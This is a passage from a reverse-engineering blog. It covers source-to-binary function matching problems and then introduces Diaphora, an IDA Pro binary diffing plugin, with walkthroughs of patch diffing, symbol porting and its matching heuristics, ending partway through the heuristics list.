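<p>The import order described above is a topological sort of the struct dependency tree. The following is only a minimal sketch using Python’s standard graphlib module (Python 3.9 or later); the struct_deps map and the import_order helper are hypothetical names for illustration, not part of the tool:</p>

```python
from graphlib import TopologicalSorter

# Hypothetical dependency map: struct name -> structs it embeds.
# It mirrors the example in the text: A uses B, and B uses C.
struct_deps = {
    "A": {"B"},
    "B": {"C"},
    "C": set(),
}


def import_order(deps):
    """Return the struct names so that each struct comes after the ones it uses."""
    return list(TopologicalSorter(deps).static_order())


order = import_order(struct_deps)
print(order)
```

<p>If two structs reference each other (for example through pointers), static_order() raises graphlib.CycleError, so a real importer would probably need forward declarations for that case.</p>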
<p><strong>In-lined functions</strong></p>
<p>Yet another partial problem I’m dealing with: sometimes functions are in-lined by compilers. Humans can hint the compiler to in-line a function whenever possible, but the compiler decides whether it finally in-lines the function or not. That means that some functions will always be in-lined and, thus, will not appear in the binary as independent functions; others will be in-lined only sometimes, thus appearing both inside other functions and as independent functions. We cannot rely on any of the compiler hints for in-lining functions (inline, __inline, __forceinline, __attribute__((always_inline)), __please_inline and friends). This causes some functions to match partially when they aren’t the same function. For example, consider the following functions:</p>
<p><a href="/wp-content/uploads/2018/08/start_with_cpu_inlined.png" rel="attachment wp-att-52004"><img width="100%" src="/wp-content/uploads/2018/08/start_with_cpu_inlined.png" alt="Some Busybox functions. One of them might get in-lined. Sometimes." /></a></p>
<p class="wp-caption-text">
Some Busybox functions. One of them might get in-lined. Sometimes.
</p>
<p>The function starts_with_cpu might, sometimes, get in-lined. As a result, we might wrongly match this function with another one that uses the constants ‘c’, ‘p’ and ‘u’ and has one conditional: a function that has starts_with_cpu in-lined but doesn’t do much else, so it isn’t complex enough to make these artifacts irrelevant. Result: a false positive that is hard to detect automatically.</p>
<p>This is not a problem for which I have a solution that really works. For now. One of the solutions I considered was creating functions with various versions of in-line candidates inside. It caused the source code export times to explode and, in my tests, less than 1% of the functions with in-lines were matched. The code is there and the feature can be used, but it will not be enabled by default and, eventually, might get removed.</p>
<p>Another idea that I have to solve this problem, or at least a large percentage of its occurrences, is the following: once I have a match that is not “100% perfect”, i.e., some rare and long enough string constants matched, but there are constants in the binary function that aren’t in the source function, search for candidate in-line functions with these rare string constants and try to determine whether the comparison ratio is better when both functions are combined. This way, I could find in-line functions at diffing time instead of at export time, and only when I have a match that is relevant enough to justify checking whether it’s a function with one or more functions in-lined (because it will be a heavy operation).</p>
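<p>To make the idea a bit more concrete, here is a rough sketch of how such a diffing-time search could look. Everything in it is an assumption made for illustration: the Jaccard-style ratio, the function names and the constants are hypothetical, and the tool may end up doing something quite different:</p>

```python
def ratio(a, b):
    """Jaccard similarity between two sets of constants (0.0 to 1.0)."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def best_inline_candidate(src_consts, bin_consts, candidates):
    """Find the candidate whose constants, merged into the source function,
    improve the ratio against the binary function the most."""
    base = ratio(src_consts, bin_consts)
    leftover = bin_consts - src_consts  # constants the source cannot explain
    best_name, best_ratio = None, base
    for name, consts in candidates.items():
        if not (consts & leftover):
            continue  # shares none of the unexplained constants
        merged = ratio(src_consts | consts, bin_consts)
        if merged > best_ratio:
            best_name, best_ratio = name, merged
    return best_name, base, best_ratio


# Hypothetical data: constants seen in the source and in the binary function.
src = {"usage: %s", "-v"}
binary = {"usage: %s", "-v", "cpu", "MHz", "model name"}
candidates = {
    "read_cpu_info": {"cpu", "MHz", "model name"},
    "parse_mem": {"MemTotal", "cpu"},
    "print_usage": {"usage: %s"},
}

result = best_inline_candidate(src, binary, candidates)
print(result)
```

<p>Restricting the search to candidates that share at least one unexplained constant keeps the heavy part (recomputing the ratio) limited to a few functions per match.</p>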
<p><strong>What about C++?</strong></p>
<p>I have no plans, at least not for now, to adapt it to support C++. Actually, I’m almost sure it cannot be used with non trivial C++. Why? A simple example: how many function calls are in the following C++ code?</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="k">class</span><span class="o">::</span><span class="n">member</span><span class="p">(</span><span class="kt">int</span> <span class="n">a</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CObj</span> <span class="n">obj</span><span class="p">;</span>
<span class="n">obj</span><span class="p">.</span><span class="n">do_stuff</span><span class="p">(</span><span class="n">a</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Answer: we cannot determine it with the given information. For example, the constructor of CObj might call one, two or ten functions (or none), and we don’t have that information here. The destructor of CObj can do the same. So, either we analyse any and all classes and create various versions of each function with and without in-lined constructors and destructors, or it will not find good matches, if it finds any at all. And this is not the only problem of analyzing non trivial C++ codes, as I would have to deal with templates, virtual functions, etc… I don’t hate myself that much.</p>
<p><strong>ETA WEN?</strong></p>
<p>I will publish the tool and my slides to the general public during the conference Hacktivity 2018, on October 12th. The tool will be open sourced, most likely under GPL, as always. However, if you want to have early access to it, you can drop me an e-mail or send me a direct message using twitter (my handle is @matalaz), and I will give you access to the private Github repository.</p>
<p>And, that’s all! I hope you liked this really long post.</p>
<h1>Diaphora, a program diffing plugin for IDA Pro</h1>
<p>joxean, 2015-03-13T09:42:33+01:00, http://joxeankoret.com/blog/2015/03/13/diaphora-a-program-diffing-plugin-for-ida-pro</p>
<p><strong>UPDATE: </strong>The plugin is now published on <a href="https://github.com/joxeankoret/diaphora">GitHub</a>.</p>
<p>Some weeks ago I started developing a binary diffing plugin for IDA Pro (in IDA Python) like Zynamics BinDiff, DarunGrim or Turbo Diff. The reasons to create one more (open source) plugin for such task are various, but the following are the main ones:</p>
<ol>
<li>We need an <strong>Open Source</strong> plugin/tool that is <strong>updated</strong>, <strong>maintained</strong> and <strong>easy to modify or adapt</strong>.</li>
<li>The plugin should do <strong>much more</strong> than what the current ones do. It must offer much more <strong>functionality</strong> than previously existing ones.</li>
<li>The plugin should be as <strong>deeply integrated in IDA</strong> as possible (because 99% of serious researchers use IDA as the main tool).</li>
<li>The plugin must <strong>not</strong> be <strong>subject</strong> <strong>to</strong> big corporation’s desires (i.e., <strong>Google</strong>).</li>
</ol>
<p>The plugin or tool I have used the most, and the one I liked the most, was Zynamics BinDiff. However, after Google bought the company, updates to it are either too slow or non-existent (you can check <a href="https://code.google.com/p/zynamics/issues/detail?id=31&can=1&q=bindiff&colspec=ID%20Product%20Type%20Status%20Priority%20Milestone%20Owner%20Summary">this issue</a> and, my favourite, <a href="https://code.google.com/p/zynamics/issues/detail?id=18&can=1&q=bindiff&colspec=ID%20Product%20Type%20Status%20Priority%20Milestone%20Owner%20Summary">this one</a>, where Google people tell users to actually patch the binary and say that, maybe, they can have a real fix the following week). Also, nobody can be sure Google is not going to finally kill the product, either by making it exclusively a private tool (i.e., only for Google) or by simply dropping it because they don’t want to support it for whatever reason (like it killed GoogleCode and other things before). For this reason, because I don’t like any of the current open source plugins for bindiffing and, also, because they lack most of the features that, in my mind, a decent present-day binary diffing tool should have, I decided to create one of my own: Diaphora.</p>
<!--more-->
<p>NOTE: If you’re not interested in the non-technical aspect of this project, skip until the “Finding differences in new versions (Patch diffing)” section 😉</p>
<p><strong>Introduction</strong></p>
<p>Diaphora (διαφορά, in Greek “difference”) is a pure Python plugin for IDA Pro to perform program comparison, what is often referred to as “Binary Diffing”. This plugin is based on all the previously published research and work of Thomas Dullien (aka Halvar Flake) and Rolf Rolles as well as my own research and ideas on this subject. I always found that the bindiff tools did not import enough information from database to database, if any at all. For example: I’m a heavy user of structures and enumerations in IDA and I always have to import them manually. This is tedious and I’m lazy. Another problem: sometimes, I perform malware analysis and I want to check the call graph of the malware samples: only Zynamics BinDiff does so. Also, many times I need to match functions from x86, x86_64 and ARM binaries interchangeably. The Zynamics plugin works “great” overall, but can fail to match many functions because the compiler used is different, naturally. However, the Hex-Rays decompiler is not typically bothered by such changes and the pseudo-code is rather similar, if not 100% equal. So, why not use the decompiler too? And this is (one of the many things) I do: I use both the AST the Hex-Rays decompiler offers and the pseudo-code. It allows me to perform, interchangeably, binary diffing with x86, x86_64 and ARM at levels that are ahead of the current binary diffing tools or plugins.</p>
<p>It isn’t 100% public yet because it is in BETA stage, but it will be published soon, most likely on GitHub. But, anyway, I think that’s enough talk about dates and about what it is and what it is not; let’s see it in action 😉</p>
<h2 id="finding-differences-in-new-versions-patch-diffing-heading_20_2"><span class="T2">Finding differences in new versions (Patch diffing)</span></h2>
<p class="Text_20_body">
In order to use Diaphora we need at least two binary files to compare. I will take as an example 2 different versions of the “avast” binary from Avast for Linux x86_64. The files have the following hashes:
</p>
<ol>
<li>
<p class="P10">
<span class="T2">ed5bdbbfaf25b065cf9ee50730334998 avast</span>
</p>
</li>
<li>
<p class="P10">
<span class="T2">72a05d44b2ac3d7a1c9d2ab5939af782 avast-72a05d44b2ac3d7a1c9d2ab5939af782</span>
</p>
</li>
</ol>
<p class="P1">
<span class="T2">The file “avast-&lt;hash&gt;” is the previous version and the binary “avast” is the latest one. Launch IDA Pro for 64 bits (idaq64) and open the file “avast-72a05d44b2ac3d7a1c9d2ab5939af782”. Once the initial auto-analysis finishes, launch Diaphora by either running the script “diaphora.py” or, if it’s installed (i.e., copied to the $IDA_DIR/plugins/ directory), using the Edit → Plugins → Diaphora – Export or diff option. The following dialog will open:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image1.png"><img class="aligncenter size-full wp-image-21931" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image1.png" alt="image1" /></a>
</p>
<p class="P1">
<span class="T2">We only need to care about 2 things:</span>
</p>
1. <p class="P4">
<span class="T2">Field “</span><span class="T4">Export current database to SQLite</span><span class="T2">”. This is the path to the SQLite database that will be created with all the information extracted from the IDA database of this avast binary.</span><span class="odfLiEnd"> </span>
</p>
2. <p class="P4">
<span class="T2">Field “</span><span class="T4">Use the decompiler if available</span><span class="T2">”. If the Hex-Rays decompiler is available and we want to use it, we will leave this check-box marked, otherwise un-check it.</span><span class="odfLiEnd"> </span>
</p>
<p class="P1">
<span class="T2">After correctly selecting the appropriate values, press OK. It will start exporting all the data from the IDA database. When the export process finishes the message “Database exported.” will appear in the IDA’s Output Window. </span>Now, close this database, save the changes and open the “avast” binary. Wait until the IDA’s auto-analysis finishes and, after it, run Diaphora like with the previous binary file. This time, we will select in the 2nd field, the one named “Open SQLite database to diff”, the path to the .sqlite file we just exported in the previous step, as shown in the next figure:
</p>
<p class="P1">
<img class="aligncenter size-full wp-image-21933" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image2.png" alt="image2" />
</p>
<p class="P1">
After this, press the OK button, as we will use the default options. It will first export the current IDA database to the SQLite format as understood by Diaphora and, then, right after finishing, compare both databases. It will show an IDA’s wait box dialog with the current heuristic being applied to match functions in both databases as shown in the next figure:
</p>
<p class="P1">
<img class="aligncenter size-full wp-image-21935" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image3.png" alt="image3" />
</p>
<p class="P1">
<span class="T2">After a while a set of lists (choosers, in Hex-Rays parlance) will appear:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image4.png"><img class="aligncenter size-full wp-image-21938" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image4.png" alt="image4" /></a>
</p>
<p class="P1">
<span class="T2">There is one more list that is not shown for this database, the one named “Unreliable matches”. This list holds all the matches that aren’t considered reliable. However, in the case of this binary with symbols, there isn’t even a single unreliable result. There are, however, unmatched functions in both the primary (the latest version) and the secondary database (the previous version):</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image5.png"><img class="aligncenter size-full wp-image-21940" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image5.png" alt="image5" /></a>
</p>
<p class="P1">
<span class="T2">The previous image shows the functions not matched in the secondary database, that is, the functions removed in the latest version. The next figure shows the functions not matched in the primary database, that is, the new functions added:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image6.png"><img class="aligncenter size-full wp-image-21942" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image6.png" alt="image6" /></a>
</p>
<p class="P1">
<span class="T2">It seems they added various functions to check for SSE, AVX and other Intel instruction sets. Also, they added 2 new functions called handler and context. Let’s now take a look at the “Best matches” tab:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image7.png"><img class="aligncenter size-full wp-image-21944" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image7.png" alt="image7" /></a>
</p>
<p class="P1">
<span class="T2">There are many functions in the “Best matches” tab, 2556 functions, while the primary database contains 2659 functions. The results shown in the “Best matches” tab are those functions matched with some heuristic (like “100% equal”, where all attributes are equal, or “Equal pseudo-code”, where the pseudo-code generated by the decompiler is equal) that, apparently, don’t have any difference at all. If you’re diffing these binaries to find vulnerabilities fixed by a new patch, just skip this tab; you will be more interested in the “Partial matches” one 😉 In that tab we have many more results:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image8.png"><img class="aligncenter size-full wp-image-21946" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image8.png" alt="image8" /></a>
</p>
<p class="P1">
<span class="T2">It shows the functions matched between both databases and, in the description field, it says which heuristic matched and the similarity ratio. If you’re looking for functions where a vulnerability was likely fixed, this is where you want to look. It seems that the function “handle_scan_item”, for example, was heavily modified: the ratio is 0.49, which means that roughly half of the function differs between both databases. Let’s see the differences: we can see them in an assembly graph, in plain assembly or we can diff the pseudo-code too. Right click on the result and select “Diff assembly in a graph”; the following graph will appear:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image9.png"><img class="aligncenter size-full wp-image-21948" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image9.png" alt="image9" /></a>
</p>
<p class="P1">
<span class="T2">The nodes in yellow are those with only minor changes; the pink ones are those that are either new or heavily modified; and the blank ones are the basic blocks that were not modified at all. Now let’s diff the assembly in plain text: go back to the “Partial matches” tab, right click on the function “handle_scan_item” and select “Diff assembly”:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image10.png"><img class="aligncenter size-full wp-image-21951" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image10.png" alt="image10" /></a>
</p>
<p class="P1">
<span class="T2">It shows the differences, in plain assembly, that one would see by using a tool like the Unix command “diff”. We can also diff the pseudo-code: go back to the “Partial matches” tab, right click on the function and select “Diff pseudo-code”:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image11.png"><img class="aligncenter size-full wp-image-21953" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image11.png" alt="image11" /></a>
</p>
<p class="P1">
<span class="T2">As we can see, it shows all the differences in the pseudo-code in a side-by-side diff, like the assembly diff. Once you know how the 3 different ways of viewing differences work, you can choose your favourite or use all 3, depending on the specific case. Indeed, I use all 3 depending on the kind of change I’m looking for.</span>
</p>
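<p>For readers who want to play with the concepts outside IDA, a similarity ratio and a “diff”-like plain text view can be approximated with Python’s standard difflib module. This is only a sketch under the assumption that a ratio of 1.0 means “equal”; the two instruction lists are made up, and this is not necessarily how Diaphora calculates its own ratios:</p>

```python
import difflib

# Hypothetical instruction listings of one function in two versions.
old = ["mov eax, 1", "call check", "ret"]
new = ["mov eax, 1", "call check", "test eax, eax", "jz fail", "ret"]

# 1.0 means both sequences are equal, 0.0 means nothing in common.
ratio = difflib.SequenceMatcher(None, old, new).ratio()

# The same kind of output the Unix "diff -u" command would show.
diff = list(difflib.unified_diff(old, new, "previous", "latest", lineterm=""))

print(ratio)
print("\n".join(diff))
```

<p>Here 3 of the 8 lines in total are shared by both versions, so the ratio is 2 * 3 / 8 = 0.75.</p>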
<h2><span class="T2">Ignoring small differences: Finding new functionalities</span></h2>
<p class="P1">
<span class="T2">Sometimes, you don’t need to care about small changes when diffing 2 databases. For example, you may be looking just for the new features added to this or that program instead of for the bugs fixed in a product. We will continue with the previous binaries for this example. Go to the “Partial matches” tab and find the functions “respond” and “scan_response”:</span>
</p>
<p class="P1">
<img class="aligncenter size-full wp-image-21955" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image12.png" alt="image12" />
</p>
<p class="P1">
<span class="T2">According to the ratios shown it seems these functions are almost equal with small changes. Let’s see the differences for the function “respond”: right click on the respond function and select “Diff pseudo-code”:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image13.png"><img class="aligncenter size-full wp-image-21957" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image13.png" alt="image13" /></a>
</p>
<p class="P1">
<span class="T2">It seems that the only change in this function is, actually, the size of a stack variable and the size given to the “protocol_response” function call. If we’re looking for the new functionality added to the product, it can be irritating to go through a big list of small changes (or at least it is for me). We will re-diff both databases: run Diaphora again by either running diaphora.py or selecting Edit → Plugins → Diaphora – Export or diff and, this time, select “Relaxed calculations on difference ratios” in the dialog, as shown below:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image14.png"><img class="aligncenter size-full wp-image-21959" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image14.png" alt="image14" /></a>
</p>
<p class="P1">
<span class="T2">Press OK and wait for it to finish. When it’s finished, go to the “Best matches” tab and find the “respond” or “scan_response” functions:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image152.png"><img class="aligncenter size-full wp-image-21994" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image152.png" alt="image15" /></a>
</p>
<p class="P1">
<span class="T2">This time, as we can see, both functions appear in the “Best matches”, the list of functions that are considered equal, so you don’t need to go through a big list with small changes here and there: the “Partial matches” tab will show only functions with bigger changes, making it easier to discover the new functionalities added to the program.</span>
</p>
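<p>How the relaxed calculation works internally is not described here, so the following is only a guess at the general idea: if numeric constants are normalised before comparing, a change like the buffer size above no longer counts as a difference. The normalize and ratio helpers and the two pseudo-code snippets (including the arguments of protocol_response) are hypothetical:</p>

```python
import difflib
import re

# Matches hexadecimal or decimal numeric literals.
NUMBER = re.compile(r"\b(?:0x[0-9a-fA-F]+|\d+)\b")


def normalize(line):
    """Replace every numeric constant with a placeholder."""
    return NUMBER.sub("N", line)


def ratio(a, b, relaxed=False):
    """Line based similarity ratio, optionally ignoring numeric constants."""
    if relaxed:
        a = [normalize(line) for line in a]
        b = [normalize(line) for line in b]
    return difflib.SequenceMatcher(None, a, b).ratio()


# Hypothetical pseudo-code: only the size of the buffer changed.
old = ["char buf[256];", "protocol_response(fd, buf, 256);"]
new = ["char buf[512];", "protocol_response(fd, buf, 512);"]

strict = ratio(old, new)
relaxed = ratio(old, new, relaxed=True)
print(strict, relaxed)
```

<p>With the strict comparison no line is equal, while with the relaxed one both snippets are considered the same, which is the effect we saw when “respond” moved to the “Best matches” tab.</p>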
<h2><span class="T2">Porting symbols</span></h2>
<p class="Text_20_body">
One of the most common tasks in reverse engineering, at least in my experience, is porting symbols from previous versions of a program, library, etc… to the new version. It can be quite annoying having to port function names, enumerations, comments, structure definitions, etc… manually to new versions, especially when talking about big reverse engineering projects.
</p>
<p class="P1">
<span class="T2">In the following example, we will import the symbols, structures, enumerations, comments, prototypes, function flags, IDA type libraries, etc… from one version full of symbols to another version with the symbols stripped. We will use Busybox 1.21-1, compiled on Ubuntu Linux for x86_64. After downloading and compiling it, we will have 2 different binaries: “busybox” and “busybox_unstripped”. The latter is the version with full symbols, while the former is the one typically used for distribution, with all the symbols stripped. Launch IDA and open, first, the “busybox_unstripped” binary containing full symbols. Let IDA finish the initial auto-analysis and, after this, run Diaphora by either running diaphora.py or selecting the menu Edit → Plugins → Diaphora – Export or diff. In the dialog that opens, press OK:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image14-1.png"><img class="aligncenter size-full wp-image-21967" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image14-1.png" alt="image14-1" /></a>
</p>
<p class="P1">
<span class="T2">Wait until Diaphora finishes exporting to SQLite the current database. When it finishes, close the current IDA database and open the binary “busybox”, wait until IDA finishes the initial auto-analysis and, then, launch again Diaphora. In the next dialog select as the SQLite database to diff the previous one we just created, the one with all the symbols from the previous binary:</span>
</p>
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image14-2.png"><img class="aligncenter size-full wp-image-21971" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image14-2.png" alt="image14-2" /></a>
<p class="P1">
<span class="T2">Press OK and wait until it finishes comparing both databases. After a while, it will show various tabs with all the unmatched functions in both databases, as well as the “Best”, “Partial” and “Unreliable” matches tabs.</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image18.png"><img class="aligncenter size-full wp-image-21976" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image18.png" alt="image18" /></a>
</p>
<p class="P1">
<span class="T2">As we can see, Diaphora did a decent job, matching 796 functions labeled as “Best matches” and 2296 labeled as “Partial matches”, a total of 3092 functions out of 3134. Let’s go to the “Best matches” tab. All the functions here are those that were matched with a high confidence ratio. Let’s say that we want to import all the symbols for the “Best matches”: right click on the list and select “Import all functions”. It will ask if we really want to do so: press YES. It will import all function names, comments, function prototypes, structures, enumerations and even IDA’s type libraries (TILs). When it’s done, it will ask us if we want to relaunch the diffing process:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image19.png"><img class="aligncenter size-full wp-image-21978" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image19.png" alt="image19" /></a>
</p>
<p class="P1">
<span class="T2">After Diaphora imports symbols it will also update the database with the exported data from the primary database and, as a result, with the new information it may be possible to match new functions not discovered before. In this case we will just say “NO” to this dialog. </span>Now, go to the “Partial matches” tab. In this list we have some matches that don’t look like good ones:
</p>
<p class="P1">
<img class="aligncenter size-full wp-image-21980" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image20.png" alt="image20" />
</p>
<p class="P1">
<span class="T2">As we can see, the ratios are pretty low: from 0.00 to 0.14. Let’s diff the graphs of the “make_device” function (matched with the “same name” heuristic):</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image21.png"><img class="aligncenter size-full wp-image-21982" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image21.png" alt="image21" /></a>
</p>
<p class="P1">
<span class="T2">It doesn’t look like a good match. And, if it is, it’s too big to verify right now. Let’s delete this result: go back to the “Partial matches” tab, select the “make_device” match and, simply, press “DEL”. It will just remove this result. Now, do the same for the next results with a 0.00 confidence ratio. OK, bad results removed. Now, it’s time to import all the partial matches: right click on the list and select “Import all data for sub_* functions”. It will import everything for functions that are IDA auto-named, those that start with the “sub_” prefix, but it will not touch any function with a non IDA auto-generated name. It will ask us for confirmation:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image22.png"><img class="aligncenter size-full wp-image-21985" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image22.png" alt="image22" /></a>
</p>
<p class="P1">
<span class="T2">Press “Yes”, and wait until it exports everything and updates the primary database. And, that’s all! We just imported everything from function names, comments or prototypes to structures and enumerations and even IDA’s type libraries into the new database and we can just continue with our work with the new database and with all the data imported from the database we used to work on before.</span>
</p>
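<p>The rule behind “Import all data for sub_* functions” is easy to picture in code. The following sketch only shows the selection logic on plain Python data; the names_to_import helper and the list of matches are hypothetical, and the actual renaming inside IDA is left out:</p>

```python
def names_to_import(matches, only_auto_named=True):
    """Select which names to import.

    matches is a list of (name_in_current_db, name_in_other_db) pairs.
    """
    renames = {}
    for current, other in matches:
        if only_auto_named and not current.startswith("sub_"):
            continue  # never overwrite a name chosen by a human
        if other.startswith("sub_"):
            continue  # the other database has no real name to offer
        renames[current] = other
    return renames


# Hypothetical partial matches between the stripped and unstripped binaries.
matches = [
    ("sub_401000", "make_device"),
    ("my_parser", "parse_config"),
    ("sub_402000", "sub_8049000"),
]

renames = names_to_import(matches)
print(renames)
```

<p>Only the first pair survives: the second one already has a manually assigned name and the third one would just replace one auto-generated name with another.</p>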
<h1><span class="T2">Heuristics</span></h1>
<p class="P1">
<span class="T2">Diaphora uses multiple heuristics to find matches between different functions. Other competing tools like DarunGrim or TurboDiff implement one, two or a handful of heuristics, the only exception being Zynamics BinDiff, which implements a lot of heuristics. However, Diaphora is the only one implementing heuristics based on the Hex-Rays decompiler (if it’s available). The following list explains all the heuristics implemented in Diaphora as of Release Candidate 1:</span>
</p>
<h2><span class="T2">Best matches</span></h2>
* <p class="P5">
<span class="T2">The very first step is to check whether everything in both databases, even the primary key values, is equal. If so, the databases are considered 100% equal and nothing else is done.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<span class="T1"><strong>Equal pseudo-code</strong>. </span><span class="T3">The pseudo-code generated by the Hex-Rays decompiler is equal. It can match code from x86, x86_64 and ARM interchangeably.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Equal assembly</span></strong><span class="T3">. The assembly of both functions is exactly equal.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Bytes hash and names</span></strong><span class="T3">. The first byte of each assembly instruction is equal and also the referenced true names, not IDA’s auto-generated ones, have the same names.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same address, nodes, edges and mnemonics</span></strong><span class="T3">. The number of basic blocks, their addresses, the number of edges and the mnemonics in both databases are equal.</span><span class="odfLiEnd"> </span>
</p>
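<p>Since both databases are exported to SQLite, exact match heuristics like the ones above boil down to joining two sets of functions on some precomputed value. The following is a simplified sketch with an in-memory database; the table names, the bytes_hash column and the sample rows are invented for this example and do not reflect Diaphora’s real schema:</p>

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE primary_funcs (name TEXT, bytes_hash TEXT);
    CREATE TABLE secondary_funcs (name TEXT, bytes_hash TEXT);
""")

# Hypothetical exported data: one hash per function in each database.
db.executemany(
    "INSERT INTO primary_funcs VALUES (?, ?)",
    [("sub_401000", "aa11"), ("sub_402000", "bb22"), ("sub_403000", "cc33")],
)
db.executemany(
    "INSERT INTO secondary_funcs VALUES (?, ?)",
    [("respond", "aa11"), ("scan_response", "bb22"), ("handler", "dd44")],
)

# Functions whose hashes are equal in both databases are candidate matches.
rows = db.execute("""
    SELECT p.name, s.name
      FROM primary_funcs p
      JOIN secondary_funcs s ON p.bytes_hash = s.bytes_hash
     ORDER BY p.name
""").fetchall()

print(rows)
```

<p>Whatever doesn’t join (sub_403000 and handler here) stays unmatched and is left for the next, less strict heuristics.</p>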
<h2><span class="T3">Partial and unreliable matches (according to the confidence’s ratio):</span></h2>
* <p class="P12">
<strong><span class="T1">Same name</span></strong><span class="T3">. The mangled or demangled name is the same in both functions.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same address, nodes, edges and primes (re-ordered instructions)</span></strong><span class="T3">. The functions have the same address, the same number of basic blocks and edges, and the prime corresponding to the cyclomatic complexity is equal. It typically matches functions with re-ordered instructions.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Import names hash</span></strong><span class="T3">. The functions called from both functions are the same, matched by the demangled names.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Nodes, edges, complexity, mnemonics, names, prototype, in-degree and out-degree</span></strong><span class="T3">. The number of basic blocks, the mnemonics, the names, the function’s prototype, the in-degree (calls to the function) and the out-degree (calls performed to other functions) are the same.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Nodes, edges, complexity, mnemonics, names and prototype</span></strong><span class="T3">. The number of basic blocks, edges, the cyclomatic complexity, the mnemonics, the true names used in the function and even the prototype of the function (stripping the function name) are the same.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Mnemonics and names</span></strong><span class="T3">. The functions have the same mnemonics and the same true names used in the function. It’s done for functions with the same number of instructions.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Small names difference</span></strong><span class="T3">. At least 50% of the true names used in both functions are the same.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Pseudo-code fuzzy hash</span></strong><span class="T3">. It checks the normal fuzzy hash (calculated with the DeepToad’s library kfuzzy.py) for both functions.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Pseudo-code fuzzy hashes</span></strong><span class="T3">. It checks all the 3 fuzzy hashes (calculated with the DeepToad’s library kfuzzy.py) for both functions. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Similar pseudo-code</span></strong><span class="T3"><strong>.</strong> The pseudo-code generated by the Hex-Rays decompiler is similar, with a confidence ratio greater than or equal to 0.729. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<span class="T1"><strong>Pseudo-code fuzzy AST hash</strong>. </span><span class="T3">The fuzzy hash calculated via SPP (small-primes-product) from the AST of the Hex-Rays decompiled function is the same for both functions. It typically catches C constructions that are re-ordered, not just re-ordered assembly instructions. </span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Partial pseudo-code fuzzy hash</span></strong><span class="T3">. At least the first 16 bytes of the fuzzy hash (calculated with the DeepToad’s library kfuzzy.py) match for both functions. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
